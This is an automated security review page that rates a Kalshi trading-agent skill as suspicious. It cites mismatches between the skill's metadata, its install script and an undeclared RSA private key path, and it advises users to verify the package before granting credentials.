Skillv0.5.0

ClawScan security

Kalshi Agent · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

SuspiciousFeb 11, 2026, 9:27 AM

Verdict: suspicious
Confidence: high
Model: gpt-5-mini
Summary: The skill's stated purpose (a Kalshi trading CLI) is plausible, but there are multiple inconsistencies between its manifest, runtime instructions, and install steps that deserve clarification before you install or grant credentials.
Guidance: Before installing, get clarification from the publisher about several mismatches: (1) why does SKILL.md/metadata list python3/pip and the Python 'cryptography' package when the tool is installed from npm? (2) The SKILL.md and install script expect an RSA private key at ~/.kalshi/private_key.pem but that config path is not listed in the registry metadata — confirm that this private key is required and understand how it's used. Verify the kalshi-cli package source (the README points to a GitHub repo) and inspect its code for how it stores/transmits your access key and private key. Only install if you trust the kalshi-cli package owner; ensure your RSA private key is generated/stored securely (use a dedicated key, not one used elsewhere) and avoid pasting secrets into untrusted scripts. If you need this skill but cannot verify the source, request a version with a clear, auditable install spec (including any Python deps) and an explicit declaration of required files/credentials.

Review Dimensions

Purpose & Capability: noteThe skill claims to wrap the kalshi-cli tool to trade on Kalshi, which fits the stated purpose. However, the manifest and SKILL.md disagree about required artifacts: SKILL.md and install.sh require an RSA private key at ~/.kalshi/private_key.pem (used for signing) but the registry metadata lists no required config paths. The skill also declares Python requirements (python3, pip, and a Python package 'cryptography') while installation and README center on an npm package (kalshi-cli). These mismatches are disproportionate and unexplained for the simple wrapper described.
Instruction Scope: okThe runtime instructions and README focus on installing the kalshi-cli npm package, placing a private RSA key in ~/.kalshi/private_key.pem, and setting KALSHI_ACCESS_KEY. They do not instruct reading unrelated system files or exfiltrating data. The instructions are concrete and limited to the Kalshi CLI's configuration and usage.
Install Mechanism: noteInstallation (install.sh and documentation) installs kalshi-cli via npm (npm install -g kalshi-cli), which is a standard registry install. No downloads from arbitrary URLs or extract steps are used. That is expected for a CLI wrapper, but the presence of python3/pip and a Python package declaration in SKILL.md is inconsistent with the npm-centric install and isn't backed by any install steps.
Credentials: concernThe registry lists a single required env var (KALSHI_ACCESS_KEY), which is appropriate for Kalshi access keys — but SKILL.md and install.sh also require a private RSA key file (~/.kalshi/private_key.pem). That file path was NOT declared in the registry metadata. Additionally, SKILL.md declares a Python package dependency ('cryptography>=41.0.0') even though no Python code is included; these unexplained credential/file requirements increase risk and should be justified.
Persistence & Privilege: okThe skill does not request 'always: true' and will not be force-included. install.sh writes a ~/.kalshi/.env file only if one does not exist and prompts the user to place private keys in ~/.kalshi/private_key.pem; this is expected for a CLI configuring API keys. The skill does not modify other skills or system-wide configs beyond the user's home directory and a global npm install (which is normal for CLI tools).